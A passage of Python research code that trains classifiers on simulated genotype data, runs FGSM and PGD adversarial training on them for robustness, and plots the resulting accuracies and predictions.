imageDir = os.path.join(ProjectDir,"test_images"+"_rep%s"%(rep))
else:
imageDir = os.path.join(ProjectDir,"test_images")
if not os.path.exists(imageDir):
os.makedirs(imageDir)
for i in range(x_test.shape[0]):
clean_gmFILE = os.path.join(imageDir,"examp{}_clean.npy".format(i))
clean_image = x_test[i]
clean_imageFILE = os.path.join(imageDir,"examp{}_clean.png".format(i))
plt.imsave(clean_imageFILE, clean_image)
if FGSM:
fgsm_gmFILE = os.path.join(imageDir,"examp{}_fgsm.npy".format(i))
fgsm_imageFILE = os.path.join(imageDir,"examp{}_fgsm.png".format(i))
fgsm_delta_imageFILE = os.path.join(imageDir,"examp{}_fgsm_delta.png".format(i))
fgsm_image = x_fgsm[i]
fgsm_delta_image = clean_image - fgsm_image
plt.imsave(fgsm_imageFILE, fgsm_image)
plt.imsave(fgsm_delta_imageFILE, fgsm_delta_image)
if PGD:
pdg_gmFILE = os.path.join(imageDir,"examp{}_pgd.npy".format(i))
pgd_imageFILE = os.path.join(imageDir,"examp{}_pgd.png".format(i))
pgd_delta_imageFILE = os.path.join(imageDir,"examp{}_pgd_delta.png".format(i))
pgd_image = x_pgd[i]
pgd_delta_image = clean_image - pgd_image
plt.imsave(pgd_imageFILE, pgd_image)
plt.imsave(pgd_delta_imageFILE, pgd_delta_image)
progress_bar(i/float(x_test.shape[0]))
progress_bar(x_test.shape[0]/float(x_test.shape[0]))
print("\n")
if FGSM:
########## Adversarial training (FGSM) #############
## similar objects as above except these have the extension _fgsm and _pgd
print("Repeating the process, training training on adversarial examples (FGSM)")
# define the attack generator for training examples
adv_train_params = copy.deepcopy(TrainParams)
adv_train_params["model"] = model
adv_train_params["attackName"] = "fgsm"
adv_train_params["attackParams"] = fgsm_params
adv_train_params["attackFraction"] = 1.0
adv_train_params["writeAttacks"] = True
adv_train_params["batchSize"] = attackBatchSize
attackGen_train = SequenceBatchGenerator(**adv_train_params)
# attack the entire training set and write adversarial examples to disk
print("Attacking the training set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_train_numReps/float(adv_train_params["batchSize"])))
for i in range(num_batches):
x_train,y_train = attackGen_train.__getitem__(i)
progress_bar(i/float(num_batches))
progress_bar(num_batches/float(num_batches))
# define the attack generator for validation examples
adv_vali_params = copy.deepcopy(ValiParams)
adv_vali_params["model"] = model
adv_vali_params["attackName"] = "fgsm"
adv_vali_params["attackParams"] = fgsm_params
adv_vali_params["attackFraction"] = 1.0
adv_vali_params["writeAttacks"] = True
adv_vali_params["batchSize"] = attackBatchSize
attackGen_vali = SequenceBatchGenerator(**adv_vali_params)
# attack the entire validation set and write adversarial examples to disk
print("\nAttacking the validation set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_vali_numReps/float(adv_vali_params["batchSize"])))
for i in range(num_batches):
x_vali,y_vali = attackGen_vali.__getitem__(i)
progress_bar(i/float(num_batches))
progress_bar(num_batches/float(num_batches))
# reset generator parameters in preperation for model fit
adv_train_params["attackFraction"] = attackFraction
adv_train_params["writeAttacks"] = False
adv_train_params["batchSize"] = og_train_bs
attackGen_train = SequenceBatchGenerator(**adv_train_params)
adv_vali_params["attackFraction"] = attackFraction
adv_vali_params["writeAttacks"] = False
adv_vali_params["batchSize"] = og_vali_bs
attackGen_vali = SequenceBatchGenerator(**adv_vali_params)
## define the new model
print('\n')
model_fgsm = ModelFuncPointer(x_train,y_train)
## Early stopping and saving the best weights
TimingCB = TimingCallback()
callbacks_list_fgsm = [
EarlyStopping(
monitor='val_loss',
verbose=1,
min_delta=0.01,
patience=25),
ModelCheckpoint(
filepath=network[1].replace(".h5","_fgsm.h5"),
monitor='val_loss',
save_best_only=True),
TerminateOnNaN(),
TimingCB
]
# Train the network
history_fgsm = model_fgsm.fit(x=attackGen_train,
epochs=numEpochs,
validation_data=attackGen_vali,
callbacks=callbacks_list_fgsm,
use_multiprocessing=False,
verbose=2)
# Write the network
if(network != None):
##serialize model_fgsm to JSON
model_json_fgsm = model_fgsm.to_json()
with open(network[0].replace(".json","_fgsm.json"), "w") as json_file:
json_file.write(model_json_fgsm)
# Load json and create model
if(network != None):
jsonFILE = open(network[0].replace(".json","_fgsm.json"),"r")
loadedModel_fgsm = jsonFILE.read()
jsonFILE.close()
model_fgsm=model_from_json(loadedModel_fgsm)
model_fgsm.load_weights(network[1].replace(".h5","_fgsm.h5"))
else:
print("Error: model_fgsm and weights_fgsm not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean_fgsm = tf.metrics.CategoricalAccuracy()
test_acc_fgsm_fgsm = tf.metrics.CategoricalAccuracy()
test_acc_pgd_fgsm = tf.metrics.CategoricalAccuracy()
# predict on clean test examples
print("Predicting on clean examples...")
y_pred_fgsm = model_fgsm.predict(x_test)
test_acc_clean_fgsm(y_test, y_pred_fgsm)
print('test acc on clean examples (%): {:.3f}'.format(test_acc_clean_fgsm.result() * 100))
# predict on adversarial test examples using FGSM
print("Predicting on FGSM examples...")
y_pred_fgsm_fgsm = model_fgsm.predict(x_fgsm)
test_acc_fgsm_fgsm(y_test, y_pred_fgsm_fgsm)
print('test acc on FGSM adversarial examples (%): {:.3f}'.format(test_acc_fgsm_fgsm.result() * 100))
if PGD:
# predict on adversarial test examples using PGD
print("Predicting on PGD examples...")
y_pred_pgd_fgsm = model_fgsm.predict(x_pgd)
test_acc_pgd_fgsm(y_test, y_pred_pgd_fgsm)
print('test acc on PGD adversarial examples (%): {:.3f}'.format(test_acc_pgd_fgsm.result() * 100))
## write results
print("results_fgsm written to: ",resultsFile.replace(".p","_fgsm.p"))
history_fgsm.history["fit_time"] = TimingCB.logs
history_fgsm.history['loss'] = np.array(history_fgsm.history['loss'])
history_fgsm.history['val_loss'] = np.array(history_fgsm.history['val_loss'])
history_fgsm.history['predictions'] = np.array(y_pred_fgsm)
history_fgsm.history['predictions_fgsm'] = np.array(y_pred_fgsm_fgsm)
if PGD:
history_fgsm.history['predictions_pgd'] = np.array(y_pred_pgd_fgsm)
history_fgsm.history['Y_test'] = np.array(y_test)
history_fgsm.history['name'] = ModelName
pickle.dump(history_fgsm.history, open( resultsFile.replace(".p","_fgsm.p"), "wb" ))
if PGD:
########## Adversarial training (PGD) #############
## similar objects as above except these have the extension _fgsm and _pgd
print("\nRepeating the process, training training on adversarial examples (PGD)")
# define the attack generator for training examples
adv_train_params = copy.deepcopy(TrainParams)
adv_train_params["model"] = model
adv_train_params["attackName"] = "pgd"
adv_train_params["attackParams"] = pgd_params
adv_train_params["attackFraction"] = 1.0
adv_train_params["writeAttacks"] = True
adv_train_params["batchSize"] = attackBatchSize
attackGen_train = SequenceBatchGenerator(**adv_train_params)
# attack the entire training set and write adversarial examples to disk
print("Attacking the training set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_train_numReps/float(adv_train_params["batchSize"])))
for i in range(num_batches):
x_train,y_train = attackGen_train.__getitem__(i)
progress_bar(i/float(num_batches))
# define the attack generator for validation examples
adv_vali_params = copy.deepcopy(ValiParams)
adv_vali_params["model"] = model
adv_vali_params["attackName"] = "pgd"
adv_vali_params["attackParams"] = pgd_params
adv_vali_params["attackFraction"] = 1.0
adv_vali_params["writeAttacks"] = True
adv_vali_params["batchSize"] = attackBatchSize
attackGen_vali = SequenceBatchGenerator(**adv_vali_params)
# attack the entire validation set and write adversarial examples to disk
print("\nAttacking the validation set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_vali_numReps/float(adv_vali_params["batchSize"])))
for i in range(num_batches):
x_vali,y_vali = attackGen_vali.__getitem__(i)
progress_bar(i/float(num_batches))
# reset generator parameters in preperation for model fit
adv_train_params["attackFraction"] = attackFraction
adv_train_params["writeAttacks"] = False
adv_train_params["batchSize"] = og_train_bs
attackGen_train = SequenceBatchGenerator(**adv_train_params)
adv_vali_params["attackFraction"] = attackFraction
adv_vali_params["writeAttacks"] = False
adv_vali_params["batchSize"] = og_vali_bs
attackGen_vali = SequenceBatchGenerator(**adv_vali_params)
## define the new model
print('\n')
model_pgd = ModelFuncPointer(x_train,y_train)
## Early stopping and saving the best weights
TimingCB = TimingCallback()
callbacks_list_pgd = [
EarlyStopping(
monitor='val_loss',
verbose=1,
min_delta=0.01,
patience=25),
ModelCheckpoint(
filepath=network[1].replace(".h5","_pgd.h5"),
monitor='val_loss',
save_best_only=True),
TerminateOnNaN(),
TimingCB
]
# Train the network
history_pgd = model_pgd.fit(x=attackGen_train,
epochs=numEpochs,
validation_data=attackGen_vali,
callbacks=callbacks_list_pgd,
use_multiprocessing=False,
verbose=2)
# Write the network
if(network != None):
##serialize model_pgd to JSON
model_json_pgd = model_pgd.to_json()
with open(network[0].replace(".json","_pgd.json"), "w") as json_file:
json_file.write(model_json_pgd)
# Load json and create model
if(network != None):
jsonFILE = open(network[0].replace(".json","_pgd.json"),"r")
loadedModel_pgd = jsonFILE.read()
jsonFILE.close()
model_pgd=model_from_json(loadedModel_pgd)
model_pgd.load_weights(network[1].replace(".h5","_pgd.h5"))
else:
print("Error: model_pgd and weights_pgd not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean_pgd = tf.metrics.CategoricalAccuracy()
test_acc_fgsm_pgd = tf.metrics.CategoricalAccuracy()
test_acc_pgd_pgd = tf.metrics.CategoricalAccuracy()
# predict on clean test examples
print("Predicting on clean examples...")
y_pred_pgd = model_pgd.predict(x_test)
test_acc_clean_pgd(y_test, y_pred_pgd)
print('test acc on clean examples (%): {:.3f}'.format(test_acc_clean_pgd.result() * 100))
if FGSM:
# predict on adversarial test examples using FGSM
print("Predicting on FGSM examples...")
y_pred_fgsm_pgd = model_pgd.predict(x_fgsm)
test_acc_fgsm_pgd(y_test, y_pred_fgsm_pgd)
print('test acc on FGSM adversarial examples (%): {:.3f}'.format(test_acc_fgsm_pgd.result() * 100))
# predict on adversarial test examples using PGD
print("Predicting on PGD examples...")
y_pred_pgd_pgd = model_pgd.predict(x_pgd)
test_acc_pgd_pgd(y_test, y_pred_pgd_pgd)
print('test acc on PGD adversarial examples (%): {:.3f}'.format(test_acc_pgd_pgd.result() * 100))
## write results
print("results_pgd written to: ",resultsFile.replace(".p","_pgd.p"))
history_pgd.history["fit_time"] = TimingCB.logs
history_pgd.history['loss'] = np.array(history_pgd.history['loss'])
history_pgd.history['val_loss'] = np.array(history_pgd.history['val_loss'])
history_pgd.history['predictions'] = np.array(y_pred_pgd)
if FGSM:
history_pgd.history['predictions_fgsm'] = np.array(y_pred_fgsm_pgd)
history_pgd.history['predictions_pgd'] = np.array(y_pred_pgd_pgd)
history_pgd.history['Y_test'] = np.array(y_test)
history_pgd.history['name'] = ModelName
pickle.dump(history_pgd.history, open( resultsFile.replace(".p","_pgd.p"), "wb" ))
######### write log ###########
outLog = resultsFile.replace(".p","_log.txt")
with open(outLog, "w") as fOUT:
fOUT.write("Before adversarial training\n")
fOUT.write("===========================\n")
fOUT.write('test acc on clean examples (%): {:.3f}\n'.format(test_acc_clean.result() * 100))
if FGSM:
fOUT.write('test acc on FGSM adversarial examples (%): {:.3f}\n'.format(test_acc_fgsm.result() * 100))
if PGD:
fOUT.write('test acc on PGD adversarial examples (%): {:.3f}\n'.format(test_acc_pgd.result() * 100))
if FGSM:
fOUT.write("After adversarial training (fgsm attack)\n")
fOUT.write("===========================\n")
fOUT.write('test acc on clean examples (%): {:.3f}\n'.format(test_acc_clean_fgsm.result() * 100))
fOUT.write('test acc on FGSM adversarial examples (%): {:.3f}\n'.format(test_acc_fgsm_fgsm.result() * 100))
if PGD:
fOUT.write('test acc on PGD adversarial examples (%): {:.3f}\n'.format(test_acc_pgd_fgsm.result() * 100))
if PGD:
fOUT.write("After adversarial training (pgd attack)\n")
fOUT.write("===========================\n")
fOUT.write('test acc on clean examples (%): {:.3f}\n'.format(test_acc_clean_pgd.result() * 100))
if FGSM:
fOUT.write('test acc on FGSM adversarial examples (%): {:.3f}\n'.format(test_acc_fgsm_pgd.result() * 100))
fOUT.write('test acc on PGD adversarial examples (%): {:.3f}\n'.format(test_acc_pgd_pgd.result() * 100))
return
#-------------------------------------------------------------------------------------------
def predict_cleverhans_tf2(ModelFuncPointer,
ModelName,
NetworkDir,
ProjectDir,
TrainGenerator,
ValidationGenerator,
TestGenerator,
test_info=None,
resultsFile=None,
numEpochs=10,
epochSteps=100,
validationSteps=1,
init=None,
network=None,
nCPU = 1,
gpuID = 0,
paramsID = None,
FGSM=False,
PGD=False,
task=None):
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
########### Prediction on non-adversarial trained network #############
# Load json and create model
if(network != None):
jsonFILE = open(network[0],"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(network[1])
else:
print("Error: model and weights not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean = tf.metrics.CategoricalAccuracy()
test_acc_fgsm = tf.metrics.CategoricalAccuracy()
test_acc_pgd = tf.metrics.CategoricalAccuracy()
# Read all clean test data into memory
x_test, y_test = TestGenerator.__getitem__(0)
predictions = model.predict(x_test)
#replace predictions and Y_test in results file
history= pickle.load(open(resultsFile, "rb"))
tmp = []
if task == "expansion":
task_key = "gr"
if task == "admixture":
task_key = "m"
for gr in test_info[task_key]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history["Y_test"] = np.array(tmp)
history['predictions'] = np.array(predictions)
#rewrite result file
newResultsFile = resultsFile.replace(".p","_params%s.p"%(paramsID))
print("new results written to: ",newResultsFile)
pickle.dump(history, open(newResultsFile, "wb"))
test_acc_clean(y_test, predictions)
if FGSM:
########### Prediction on adversarial trained network (FGSM) #############
# Load json and create model
if(network != None):
jsonFILE = open(network[0].replace(".json","_fgsm.json"),"r")
loadedModel_fgsm = jsonFILE.read()
jsonFILE.close()
model_fgsm=model_from_json(loadedModel_fgsm)
model_fgsm.load_weights(network[1].replace(".h5","_fgsm.h5"))
else:
print("Error: model_fgsm and weights_fgsm not loaded")
sys.exit(1)
predictions_fgsm = model_fgsm.predict(x_test)
#replace predictions and T_test in results file
history_fgsm = pickle.load(open(resultsFile.replace(".p","_fgsm.p"), "rb"))
tmp = []
for gr in test_info[task_key]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history_fgsm["Y_test"] = np.array(tmp)
history_fgsm['predictions'] = np.array(predictions_fgsm)
test_acc_fgsm(y_test, predictions_fgsm)
# rewrite new results file
newResultsFile = resultsFile.replace(".p","_fgsm_params%s.p"%(paramsID))
print("new results written to: ", newResultsFile)
pickle.dump(history_fgsm, open(newResultsFile, "wb"))
if PGD:
########### Prediction on adversarial trained network (PGD) #############
# Load json and create model
if(network != None):
jsonFILE = open(network[0].replace(".json","_pgd.json"),"r")
loadedModel_pgd = jsonFILE.read()
jsonFILE.close()
model_pgd=model_from_json(loadedModel_pgd)
model_pgd.load_weights(network[1].replace(".h5","_pgd.h5"))
else:
print("Error: model_pgd and weights_pgd not loaded")
sys.exit(1)
predictions_pgd = model_pgd.predict(x_test)
#replace predictions and T_test in results file
history_pgd = pickle.load(open(resultsFile.replace(".p","_pgd.p"), "rb"))
tmp = []
for gr in test_info[task_key]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history_pgd["Y_test"] = np.array(tmp)
history_pgd['predictions'] = np.array(predictions_pgd)
test_acc_pgd(y_test, predictions_pgd)
## print results
print('test acc on clean examples (%): {:.3f}'.format(test_acc_clean.result() * 100))
print('test acc on FGSM adversarial examples (%): {:.3f}'.format(test_acc_fgsm.result() * 100))
print('test acc on PGD adversarial examples (%): {:.3f}'.format(test_acc_pgd.result() * 100))
# rewrite new results file
newResultsFile = resultsFile.replace(".p","_pgd_params%s.p"%(paramsID))
print("new results written to: ", newResultsFile)
pickle.dump(history_pgd, open(newResultsFile, "wb"))
######### write log ###########
outLog = resultsFile.replace(".p","_log_params%s.txt"%(paramsID))
with open(outLog, "w") as fOUT:
fOUT.write("Before adversarial training\n")
fOUT.write("===========================\n")
fOUT.write('test acc on test_paramsB examples (%): {:.3f}\n'.format(test_acc_clean.result() * 100))
if FGSM:
fOUT.write("After adversarial training (fgsm attack)\n")
fOUT.write("===========================\n")
fOUT.write('test acc on test_paramsB examples (%): {:.3f}\n'.format(test_acc_fgsm.result() * 100))
if PGD:
fOUT.write("After adversarial training (pgd attack)\n")
fOUT.write("===========================\n")
fOUT.write('test acc on test_paramsB examples (%): {:.3f}\n'.format(test_acc_pgd.result() * 100))
return None
#-------------------------------------------------------------------------------------------
def progress_bar(percent, barLen = 50):
sys.stdout.write("\r")
progress = ""
for i in range(barLen):
if i < int(barLen * percent):
progress += "="
else:
progress += " "
sys.stdout.write("[ %s ] %.2f%%" % (progress, percent * 100))
sys.stdout.flush()
#-------------------------------------------------------------------------------------------
def getHapsPosLabels(direc,simulator,shuffle=False):
'''
loops through a trees directory created by the data generator class
and returns the repsective genotype matrices, positions, and labels
'''
haps = []
positions = []
infoFilename = os.path.join(direc,"info.p")
infoDict = pickle.load(open(infoFilename,"rb"))
labels = infoDict["y"]
#how many trees files are in this directory.
li = os.listdir(direc)
numReps = len(li) - 1 #minus one for the 'info.p' file
for i in range(numReps):
filename = str(i) + ".trees"
filepath = os.path.join(direc,filename)
treeSequence = msp.load(filepath)
haps.append(treeSequence.genotype_matrix())
positions.append(np.array([s.position for s in treeSequence.sites()]))
haps = np.array(haps)
positions = np.array(positions)
return haps,positions,labels
#-------------------------------------------------------------------------------------------
def sort_min_diff(amat):
'''this function takes in a SNP matrix with indv on rows and returns the same matrix with indvs sorted by genetic similarity.
this problem is NP, so here we use a nearest neighbors approx. it's not perfect, but it's fast and generally performs ok.
assumes your input matrix is a numpy array'''
mb = NearestNeighbors(len(amat), metric='manhattan').fit(amat)
v = mb.kneighbors(amat)
smallest = np.argmin(v[0].sum(axis=1))
return amat[v[1][smallest]]
#-------------------------------------------------------------------------------------------
def segSitesStats(treesDirec):
'''
DEPRICATED
'''
infoFilename = os.path.join(treesDirec,"info.p")
infoDict = pickle.load(open(infoFilename,"rb"))
newLabels = []
newMaxSegSites = 0
#how many trees files are in this directory.
li = os.listdir(treesDirec)
numReps = len(li) - 1 #minus one for the 'labels.txt' file
segSites = []
for i in range(numReps):
filename = str(i) + ".trees"
filepath = os.path.join(treesDirec,filename)
treeSequence = msp.load(filepath)
segSites.append(treeSequence.num_sites)
return segSites
#-------------------------------------------------------------------------------------------
def mae(x,y):
'''
Compute mean absolute error between predictions and targets
float[],float[] -> float
'''
assert(len(x) == len(y))
summ = 0.0
length = len(x)
for i in range(length):
summ += abs(x[i] - y[i])
return summ/length
#-------------------------------------------------------------------------------------------
def mse(x,y):
'''
Compute mean squared error between predictions and targets
float[],float[] -> float
'''
assert(len(x) == len(y))
summ = 0.0
length = len(x)
for i in range(length):
summ += (x[i] - y[i])**2
return summ/length
#-------------------------------------------------------------------------------------------
def plotResults(resultsFile,saveas):
'''
plotting code for testing a model on simulation.
using the resulting pickle file on a training run (resultsFile).
This function plots the results of the final test set predictions,
as well as validation loss as a function of Epochs during training.
'''
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = np.array([float(Y) for Y in results["predictions"]])
realValues = np.array([float(X) for X in results["Y_test"]])
r_2 = round((np.corrcoef(predictions,realValues)[0,1])**2,5)
mae_0 = round(mae(realValues,predictions),4)
mse_0 = round(mse(realValues,predictions),4)
labels = "$R^{2} = $"+str(r_2)+"\n"+"$mae = $" + str(mae_0)+" | "+"$mse = $" + str(mse_0)
axes[0].scatter(realValues,predictions,marker = "o", color = 'tab:purple',s=5.0,alpha=0.6)
lims = [
np.min([axes[0].get_xlim(), axes[0].get_ylim()]), # min of both axes
np.max([axes[0].get_xlim(), axes[0].get_ylim()]), # max of both axes
]
axes[0].set_xlim(lims)
axes[0].set_ylim(lims)
axes[0].plot(lims, lims, 'k-', alpha=0.75, zorder=0)
axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
lossRowIndex = 1
axes[1].plot(results["loss"],label = "mae loss",color='tab:cyan')
axes[1].plot(results["val_loss"], label= "mae validation loss",color='tab:pink')
#axes[1].plot(results["mean_squared_error"],label = "mse loss",color='tab:green')
#axes[1].plot(results["val_mean_squared_error"], label= "mse validation loss",color='tab:olive')
axes[1].legend(frameon = False,fontsize = 6)
axes[1].set_ylabel("mse")
axes[0].set_ylabel(str(len(predictions))+" msprime predictions")
axes[0].set_xlabel(str(len(realValues))+" msprime real values")
fig.subplots_adjust(left=.15, bottom=.16, right=.85, top=.92,hspace = 0.5,wspace=0.4)
height = 7.00
width = 7.00
axes[0].grid()
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def plotResultsSigmoid(resultsFile,saveas):
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = np.array([float(Y) for Y in results["predictions"]])
realValues = np.array([float(X) for X in results["Y_test"]])
const, expan = [], []
for i, val in enumerate(realValues):
if val == 0:
const.append(predictions[i])
else:
expan.append(predictions[i])
np.array(const)
np.array(expan)
mae_0 = round(mae(realValues,predictions),4)
mse_0 = round(mse(realValues,predictions),4)
labels = "$mae = $" + str(mae_0)+" | "+"$mse = $" + str(mse_0)
n_bins = np.linspace(0.0,1.0,100)
axes[0].hist(const, n_bins, color="orange", label="Constant size", alpha=0.5)
axes[0].hist(expan, n_bins, color="blue", label="Exponential growth", alpha=0.5)
axes[0].axvline(x=0.5, linestyle="--", linewidth=0.3, color="black")
axes[0].legend(prop={'size': 4})
lossRowIndex = 1
axes[1].plot(results["loss"],label = "mae loss",color="orange")
axes[1].plot(results["val_loss"], label= "mae validation loss",color="blue")
axes[1].legend(frameon = False,fontsize = 6)
axes[1].set_ylabel("mse")
axes[0].set_ylabel("N")
axes[0].set_xlabel("sigmoid output")
fig.subplots_adjust(left=.15, bottom=.16, right=.85, top=.92,hspace = 0.5,wspace=0.4)
height = 4.00
width = 4.00
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def cross_entropy(predictions, targets, epsilon=1e-12):
predictions = np.clip(predictions, epsilon, 1. - epsilon)
N = predictions.shape[0]
ce = -np.sum(targets*np.log(predictions+1e-9))/N
return ce
#-------------------------------------------------------------------------------------------
def plotResultsSoftmax2(resultsFile,saveas):
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = results["predictions"]
realValues = results["Y_test"]
const, expan = [], []
for i, val in enumerate(realValues):
if val[0] == 1.0:
const.append(1.0 - predictions[i][0])
else:
expan.append(predictions[i][1])
np.array(const)
np.array(expan)
ce = round(cross_entropy(predictions,realValues),4)
labels = "Cross entropy = " + str(ce)
n_bins = np.linspace(0.0,1.0,100)
axes[0].hist(const, n_bins, color="orange", label="Constant size", alpha=0.5)
axes[0].hist(expan, n_bins, color="blue", label="Exponential growth", alpha=0.5)
axes[0].axvline(x=0.5, linestyle="--", linewidth=0.4, color="black")
axes[0].legend(prop={'size': 4})
axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
lossRowIndex = 1
axes[1].plot(results["loss"],label = "CE loss",color="orange")
axes[1].plot(results["val_loss"], label= "CE validation loss",color="blue")
axes[1].legend(frameon = False,fontsize = 6)
axes[1].set_ylabel("Cross entropy")
axes[0].set_ylabel("N")
axes[0].set_xlabel("Predicted probability of exponential growth")
fig.subplots_adjust(left=.15, bottom=.16, right=.85, top=.92,hspace = 0.5,wspace=0.4)
height = 4.00
width = 4.00
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def plotResultsSoftmax2Heatmap(resultsFile,saveas,admixture):
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = results["predictions"]
realValues = results["Y_test"]
const, expan = [], []
const_const, const_expan, expan_const, expan_expan = 0,0,0,0
const_total, expan_total = 0,0
for i, val in enumerate(realValues):
if val[0] == 1.0:
const_total+=1
const.append(1.0 - predictions[i][0])
if predictions[i][0] > 0.5:
const_const+=1
if predictions[i][1] > 0.5:
const_expan+=1
else:
expan_total+=1
expan.append(predictions[i][1])
if predictions[i][0] > 0.5:
expan_const+=1
if predictions[i][1] > 0.5:
expan_expan+=1
np.array(const)
np.array(expan)
ce = round(cross_entropy(predictions,realValues),4)
labels = "Cross entropy = " + str(ce)
data=np.array([[const_const/float(const_total),const_expan/float(const_total)],[expan_const/float(expan_total),expan_expan/float(expan_total)]])
if admixture:
rowLabels = ["No admixture", "Admixture"]
else:
rowLabels = ["Constant", "Growth"]
heatmap = axes[0].pcolor(data, cmap=plt.cm.Blues, vmin=0.0, vmax=1.0)
cbar = plt.colorbar(heatmap, cmap=plt.cm.Blues, ax=axes[0])
cbar.set_label('Proportion assigned to class', rotation=270, labelpad=20)
# put the major ticks at the middle of each cell
axes[0].set_xticks(np.arange(data.shape[1]) + 0.5, minor=False)
axes[0].set_yticks(np.arange(data.shape[0]) + 0.5, minor=False)
axes[0].invert_yaxis()
axes[0].xaxis.tick_top()
plt.tick_params(axis='y', which='both', right='off')
plt.tick_params(axis='x', which='both', direction='out')
if admixture:
axes[0].set_xticklabels(["No admixture", "Admixture"], minor=False, fontsize=6)
else:
axes[0].set_xticklabels(["Constant", "Growth"], minor=False, fontsize=6)
axes[0].set_yticklabels(rowLabels, minor=False, fontsize=6)
for y in range(data.shape[0]):
for x in range(data.shape[1]):
val = data[y, x]
val *= 100
if val > 50:
c = '0.9'
else:
c = 'black'
axes[0].text(x + 0.5, y + 0.5, '%.1f%%' % val, horizontalalignment='center', verticalalignment='center', color=c, fontsize=6)
axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
lossRowIndex = 1
axes[1].plot(results["loss"],label = "CE loss",color="orange")
axes[1].plot(results["val_loss"], label= "CE validation loss",color="blue")
axes[1].legend(frameon = False,fontsize = 6)
axes[1].set_ylabel("Cross entropy")
fig.subplots_adjust(left=.15, bottom=.15, right=.85, top=0.87, hspace = 0.5, wspace=0.4)
height = 4.00
width = 4.00
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def plotResultsSoftmax2HeatmapMis(resultsFile, resultsFile2, saveas, admixture):
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = results["predictions"]
realValues = results["Y_test"]
const, expan = [], []
const_const, const_expan, expan_const, expan_expan = 0,0,0,0
const_total, expan_total = 0,0
for i, val in enumerate(realValues):
if val[0] == 1.0:
const_total+=1
const.append(1.0 - predictions[i][0])
if predictions[i][0] > 0.5:
const_const+=1
if predictions[i][1] > 0.5:
const_expan+=1
else:
expan_total+=1
expan.append(predictions[i][1])
if predictions[i][0] > 0.5:
expan_const+=1
if predictions[i][1] > 0.5:
expan_expan+=1
np.array(const)
np.array(expan)
ce = round(cross_entropy(predictions,realValues),4)
labels = "Cross entropy = " + str(ce)
data=np.array([[const_const/float(const_total),const_expan/float(const_total)],[expan_const/float(expan_total),expan_expan/float(expan_total)]])
if admixture:
rowLabels = ["No admixture", "Admixture"]
else:
rowLabels = ["Constant", "Growth"]
heatmap = axes[0].pcolor(data, cmap=plt.cm.Blues, vmin=0.0, vmax=1.0)
cbar = plt.colorbar(heatmap, cmap=plt.cm.Blues, ax=axes[0])
cbar.set_label('Proportion assigned to class', rotation=270, labelpad=20)
# put the major ticks at the middle of each cell
axes[0].set_xticks(np.arange(data.shape[1]) + 0.5, minor=False)
axes[0].set_yticks(np.arange(data.shape[0]) + 0.5, minor=False)
axes[0].invert_yaxis()
axes[0].xaxis.tick_top()
plt.tick_params(axis='y', which='both', right='off')
plt.tick_params(axis='x', which='both', direction='out')
if admixture:
axes[0].set_xticklabels(["No admixture", "Admixture"], minor=False, fontsize=6)
else:
axes[0].set_xticklabels(["Constant", "Growth"], minor=False, fontsize=6)
axes[0].set_yticklabels(rowLabels, minor=False, fontsize=6)
for y in range(data.shape[0]):
for x in range(data.shape[1]):
val = data[y, x]
val *= 100
if val > 50:
c = '0.9'
else:
c = 'black'
axes[0].text(x + 0.5, y + 0.5, '%.1f%%' % val, horizontalalignment='center', verticalalignment='center', color=c, fontsize=6)
axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
results = pickle.load(open(resultsFile2 , "rb"))
predictions = results["predictions"]
realValues = results["Y_test"]
const, expan = [], []
const_const, const_expan, expan_const, expan_expan = 0,0,0,0
const_total, expan_total = 0,0
for i, val in enumerate(realValues):
if val[0] == 1.0:
const_total+=1
const.append(1.0 - predictions[i][0])
if predictions[i][0] > 0.5:
const_const+=1
